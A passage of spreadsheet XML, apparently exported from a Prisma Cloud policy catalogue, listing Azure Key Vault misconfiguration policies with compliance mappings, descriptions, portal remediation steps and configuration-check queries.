        <is>
          <t>Azure Key Vault Purge protection is not enabled</t>
        </is>
      </c>
      <c r="L2273" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2273" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2273" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2273" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2273" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2273" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2273" t="inlineStr">
        <is>
          <t>ISM-1246</t>
        </is>
      </c>
      <c r="S2273" t="inlineStr"/>
      <c r="T2273" t="b">
        <v>0</v>
      </c>
      <c r="U2273" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2273" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2273" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault which has Purge protection disabled. Enabling Azure Key Vault Purge protection feature prevents malicious deletion of a key vault which can lead to permanent data loss. It is recommended to enable Purge protection for Azure Key Vault which protects by enforcing a mandatory retention period for soft deleted key vaults.</t>
        </is>
      </c>
      <c r="X2273" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to 'Key vaults', and select the reported key vault from the list
3. Under 'Settings' select 'Properties'
4. For 'Purge protection' click on 'Enable Purge protection (enforce a mandatory retention period for deleted vaults and vault objects)'
5. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-key-vault-enables-purge-protection</t>
        </is>
      </c>
      <c r="Y2273" t="inlineStr"/>
      <c r="Z2273" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' AND json.rule = properties.enablePurgeProtection is false
{"category":"General","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA2273" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2273" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2273" t="inlineStr">
        <is>
          <t>PC-AZR-KV-692-CKV_AZURE_110</t>
        </is>
      </c>
      <c r="AD2273" t="b">
        <v>1</v>
      </c>
      <c r="AE2273" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2273" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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3" t="inlineStr">
        <is>
          <t>5238e9c3-3e2e-4d94-b492-261eedc01a2e</t>
        </is>
      </c>
      <c r="AI2273" t="inlineStr">
        <is>
          <t>df4f009d-f049-4e04-bbdf-06d98b1b040f</t>
        </is>
      </c>
      <c r="AJ2273" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2273" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2274">
      <c r="A2274" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS Controls v8, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v4.0.12, kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27002:2022, CSA CCM v4.0.12, PCI DSS v4.0, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, CIS Controls v7.1, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), CSA CCM v4.0.12, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2274" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2274" s="2" t="inlineStr"/>
      <c r="D2274" t="inlineStr"/>
      <c r="E2274" t="inlineStr"/>
      <c r="F2274" t="inlineStr"/>
      <c r="G2274" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2274" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2274" t="inlineStr">
        <is>
          <t>Azure Key Vault Firewall is not enabled</t>
        </is>
      </c>
      <c r="L2274" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2274" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2274" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2274" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2274" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2274" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2274" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2274" t="inlineStr"/>
      <c r="T2274" t="b">
        <v>0</v>
      </c>
      <c r="U2274" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2274" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2274" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault which has Firewall disabled. Enabling Azure Key Vault Firewall feature prevents unauthorised traffic from reaching your key vault. It is recommend to enable Azure Key Vault Firewall which provides additional layer of protection for your secrets.</t>
        </is>
      </c>
      <c r="X2274" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to 'Key vaults', and select the reported key vault from the list
3. Under 'Settings' select 'Networking'
4. In order to "Allow public access from specific virtual networks and IP addresses", Click on 'Allow public access from specific virtual networks and IP addresses' Under 'Firewalls and virtual networks'. Add 'IPv4 address or CIDR'.
5. In order to disable public access, Click on 'Disable public access'.
6. Click on 'Save'.</t>
        </is>
      </c>
      <c r="Y2274" t="inlineStr"/>
      <c r="Z2274" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' AND json.rule = (properties.publicNetworkAccess does not equal ignore case disabled and properties.networkAcls does not exist) or (properties.publicNetworkAccess does not equal ignore case disabled and properties.networkAcls.defaultAction equal ignore case allow )</t>
        </is>
      </c>
      <c r="AA2274" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2274" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2274" t="inlineStr">
        <is>
          <t>PC-AZR-KV-690</t>
        </is>
      </c>
      <c r="AD2274" t="b">
        <v>1</v>
      </c>
      <c r="AE2274" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2274" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>7fe62a4c-4041-471c-80f5-6a78478a1ebd</t>
        </is>
      </c>
      <c r="AI2274" t="inlineStr">
        <is>
          <t>b761dbf1-d5a9-4e9d-aaf1-93d707a1fbd0</t>
        </is>
      </c>
      <c r="AJ2274" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2274" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2275">
      <c r="A2275" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CSA CCM v4.0.12, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, CIS v1.5.0 (Azure) - Level 1, CIS v1.2.0 (Azure), PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CIS Controls v8.1, MTSBv2_Azure, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CIS v1.1 (Azure), CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.6, NIST CSF v2.0, New Zealand Information Security Manual (NZISM v3.4), CyberSecurity Law of the People's Republic of China, CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, CIS v1.3.1 (Azure), MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), NIST 800-53 Rev4, FFIEC, CRI Profile v2.0, Copy of CIS Controls v8, ISO/IEC 27017:2015, CIS v2.1.0 (Azure) Level 1, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, testazure, RBI Baseline Cyber Security and Resilience Requirements, CIS v2.0.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, CCPA 2018, PIPEDA, CIS v1.4.0 (Azure), CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, NIST 800-53 Rev 5, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2275" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2275" s="2" t="inlineStr"/>
      <c r="D2275" t="inlineStr"/>
      <c r="E2275" t="inlineStr"/>
      <c r="F2275" t="inlineStr"/>
      <c r="G2275" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2275" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2275" t="inlineStr">
        <is>
          <t>Azure Key Vault secret has no expiration date (RBAC Key vault)</t>
        </is>
      </c>
      <c r="L2275" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2275" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2275" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2275" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2275" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2275" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2275" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2275" t="inlineStr"/>
      <c r="T2275" t="b">
        <v>0</v>
      </c>
      <c r="U2275" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2275" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2275" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault secrets that do not have an expiry date for the RBAC Key vaults. As a best practice, set an expiration date for each secret and rotate the secret regularly.
Before you activate this policy, ensure that you have added the Prisma Cloud Service Principal to each Key Vault: https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-azure-account/azure-onboarding-checklist
Alternatively, run the following command on the Azure cloud shell:
az keyvault list | jq '.[].id' | xargs -I {} az role assignment create --assignee "&lt;Object ID of Prisma Cloud Principal&gt;" --role "Key Vault Reader" --scope {}</t>
        </is>
      </c>
      <c r="X2275" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal.
2. Select 'All services' &gt; 'Key vaults'.
3. Select the Key vault instance where the secrets are stored.
4. Select 'Secrets', and select the secret that you need to modify.
5. Select the current version.
6. Set the expiration date.
7. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2275" t="inlineStr"/>
      <c r="Z2275" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' and json.rule = secrets[?any(attributes.exp equals -1 and attributes.enabled contains true)] exists and properties.enableRbacAuthorization is true</t>
        </is>
      </c>
      <c r="AA2275" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2275" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2275" t="inlineStr">
        <is>
          <t>PC-AZR-KV-359</t>
        </is>
      </c>
      <c r="AD2275" t="b">
        <v>1</v>
      </c>
      <c r="AE2275" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2275" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>1da48a52-fc22-414f-a1bb-f864d7fdfc77</t>
        </is>
      </c>
      <c r="AI2275" t="inlineStr">
        <is>
          <t>7f9027ca-be44-4db9-baf0-acce62c44aec</t>
        </is>
      </c>
      <c r="AJ2275" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2275" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2276">
      <c r="A2276" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.1.0 (Azure) Level 2, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, kfirdaus AWS Account-CS, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 2, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CIS Controls v8.1, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), ACSC Information Security Manual (ISM), CIS Controls v7.1, kfirdaus AWS Account-CS, Copy of New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2276" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2276" s="2" t="inlineStr"/>
      <c r="D2276" t="inlineStr"/>
      <c r="E2276" t="inlineStr"/>
      <c r="F2276" t="inlineStr"/>
      <c r="G2276" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2276" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2276" t="inlineStr">
        <is>
          <t>Azure Key vault Private endpoint connection is not configured</t>
        </is>
      </c>
      <c r="L2276" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2276" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2276" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2276" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2276" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2276" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2276" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2276" t="inlineStr"/>
      <c r="T2276" t="b">
        <v>0</v>
      </c>
      <c r="U2276" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2276" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2276" t="inlineStr">
        <is>
          <t>This policy identifies Key vaults that are not configured with a private endpoint connection. Azure Key vault private endpoints can be configured using Azure Private Link. Private Link allows users to access an Azure Key vault from within the virtual network or from any peered virtual network. When Private Link is combined with restricted NSG policies, it helps reduce the risk of data exfiltration. It is recommended to configure a Private endpoint connection to Key vaults.
For more details: 
https://docs.microsoft.com/en-us/azure/key-vault/general/private-link-service</t>
        </is>
      </c>
      <c r="X2276" t="inlineStr">
        <is>
          <t>Refer following URL for configuring Private endpoints on your Key vaults:
https://docs.microsoft.com/en-us/azure/key-vault/general/private-link-service
NOTE: The Key vault associated with private endpoints should not be allowing access from all networks in Firewalls and virtual networks section, make sure the Selected networks are configured with restrictive Virtual networks access. Otherwise the security provided by private endpoints will not be satisfied. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-32
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-32</t>
        </is>
      </c>
      <c r="Y2276" t="inlineStr"/>
      <c r="Z2276" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' AND json.rule = properties.provisioningState equals Succeeded and properties.privateEndpointConnections[*] does not exist
{"category":"General","resourceTypes":["azurerm_key_vault"]}</t>
        </is>
      </c>
      <c r="AA2276" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2276" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2276" t="inlineStr">
        <is>
          <t>PC-AZR-KV-809-CKV2_AZURE_32</t>
        </is>
      </c>
      <c r="AD2276" t="b">
        <v>1</v>
      </c>
      <c r="AE2276" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2276" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>a03ae1cb-c130-46cb-97ae-02cceab10b07</t>
        </is>
      </c>
      <c r="AI2276" t="inlineStr">
        <is>
          <t>399924f6-d0a7-4ab2-8dc4-d4b557cd01e2</t>
        </is>
      </c>
      <c r="AJ2276" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2276" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2277">
      <c r="A2277" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, ITSG-33, CIS v2.0.0 (Azure) Level 2, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CIS v2.1.0 (Azure) Level 2, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2277" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2277" s="2" t="inlineStr"/>
      <c r="D2277" t="inlineStr"/>
      <c r="E2277" t="inlineStr"/>
      <c r="F2277" t="inlineStr"/>
      <c r="G2277" t="b">
        <v>0</v>
      </c>
      <c r="H22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77" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2277" t="inlineStr">
        <is>
          <t>azure-key-vault</t>
        </is>
      </c>
      <c r="K2277" t="inlineStr">
        <is>
          <t>Azure Key Vault Role Based Access control is disabled</t>
        </is>
      </c>
      <c r="L2277" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2277" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2277" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2277" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2277" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2277" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2277" t="inlineStr">
        <is>
          <t>Access Enforcement | Role-based Access Control</t>
        </is>
      </c>
      <c r="S2277" t="inlineStr"/>
      <c r="T2277" t="b">
        <v>0</v>
      </c>
      <c r="U2277" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2277" t="inlineStr">
        <is>
          <t>azure-key-vault-list</t>
        </is>
      </c>
      <c r="W2277" t="inlineStr">
        <is>
          <t>This policy identifies Azure Key Vault instances where Role-Based Access Control (RBAC) is not enabled.
Without RBAC, managing access is less secure and can lead to improper access permissions, increasing the risk of unauthorized access to sensitive data. RBAC provides finer-grained access control, enabling secure and manageable permissions for key vault secrets, keys, and certificates. This allows for detailed permissions and the use of privileged identity management for enhanced security with Just-In-Time (JIT) access management.
As best practice, it is recommended to enable RBAC for all Azure Key Vaults to ensure secure and manageable access control.</t>
        </is>
      </c>
      <c r="X2277" t="inlineStr">
        <is>
          <t>Note: Setting Azure RBAC permission model invalidates all access policies permissions. It can cause outages when equivalent Azure roles aren’t assigned.
1. Login to the Azure portal
2. Select ‘All services’ &gt; ‘Key vaults’
3. Select the reported Key vault
4. Select ‘Access configuration’ under the ‘Settings’ section
5. Select ‘Azure role-based access control’ under ‘Permission model’ and click ‘Apply’ at the bottom of the page
6. Next assign a Role to grant access to the Key vault
  - Select  ‘Access control (IAM)’ from the left panel
  - Open the ‘Add role assignment’ pane
  - Select the appropriate role under ‘Role’ (e.g., ‘Key Vault Contributor’)
  - Assign the role to a user, group, or application by searching for the name or ID under ‘Select members’
  - Click 'Review + Assign' to apply the changes</t>
        </is>
      </c>
      <c r="Y2277" t="inlineStr"/>
      <c r="Z2277" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-key-vault-list' AND json.rule = properties.provisioningState equal ignore case Succeeded AND (properties.enableRbacAuthorization does not exist or properties.enableRbacAuthorization is false)</t>
        </is>
      </c>
      <c r="AA2277" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2277" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:57</t>
        </is>
      </c>
      <c r="AC2277" t="inlineStr">
        <is>
          <t>PC-AZR-KV-1244</t>
        </is>
      </c>
      <c r="AD2277" t="b">
        <v>1</v>
      </c>
      <c r="AE2277" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2277" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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77" t="inlineStr">
        <is>
          <t>820edcc0-154d-4d80-93a4-a4271ae7fcf8</t>
        </is>
      </c>
      <c r="AI2277" t="inlineStr">
        <is>
          <t>6f49467e-3d57-4c03-a63f-e952002b9d9b</t>
        </is>
      </c>
      <c r="AJ2277" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2277" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2278">
      <c r="A2278" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (Azure), HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v4.0.12, Telecommunications Security Act - TSA, CIS v1.4.0 (Azure), Copy of CIS Controls v8, APRA (CPS 234) Information Security, FFIEC, kashan ACSC Information Security Manual (ISM), CRI Profile v2.0, CIS Controls v7.1, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 2, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), NIST CSF v2.0, MLPS 2.0 (Level 2), SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.0.0 (Azure) Level 1, APRA (CPS 234) Information Security, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, MITRE ATT&amp;CK v12, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, FFIEC, Brazilian Data Protection Law (LGPD), Fedramp (Moderate), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CIS v1.3.1 (Azure), Matt's ATT&amp;ACK, Azure Security Benchmark (v3), DORA, Secure Controls Framework (SCF) - 2024.2, CIS v1.5.0 (Azure) - Level 1, FFIEC, HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], jneytchev-fedramp-low, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, Copy of Azure Security Benchmark (v3), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Azure Security Benchmark (v2), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), testazure, kfirdaus AWS Account-CS, CSA CCM v4.0.12, NIST 800-53 Rev4, Copy of CIS v1.2.0 (Azure), ISO/IEC 27017:2015, CIS v1.1 (Azure), DORA, CSA CCM v.4.0.1, CIS Controls v7.1, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, CIS v1.3.0 (Azure), CIS v2.1.0 (Azure) Level 1, CSA CCM v4.0.12, CIS Controls v8, APRA (CPS 234) Information Security, NIST CSF, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST SP 800-172, ISO/IEC 27002:2013, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], PIPEDA, ISO/IEC 27002:2013, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, HIPAA, PCI DSS v3.2.1, NIST 800-53 Rev 5, MTSBv2_Azure</t>
        </is>
      </c>
      <c r="B2278" s="2" t="inlineStr">
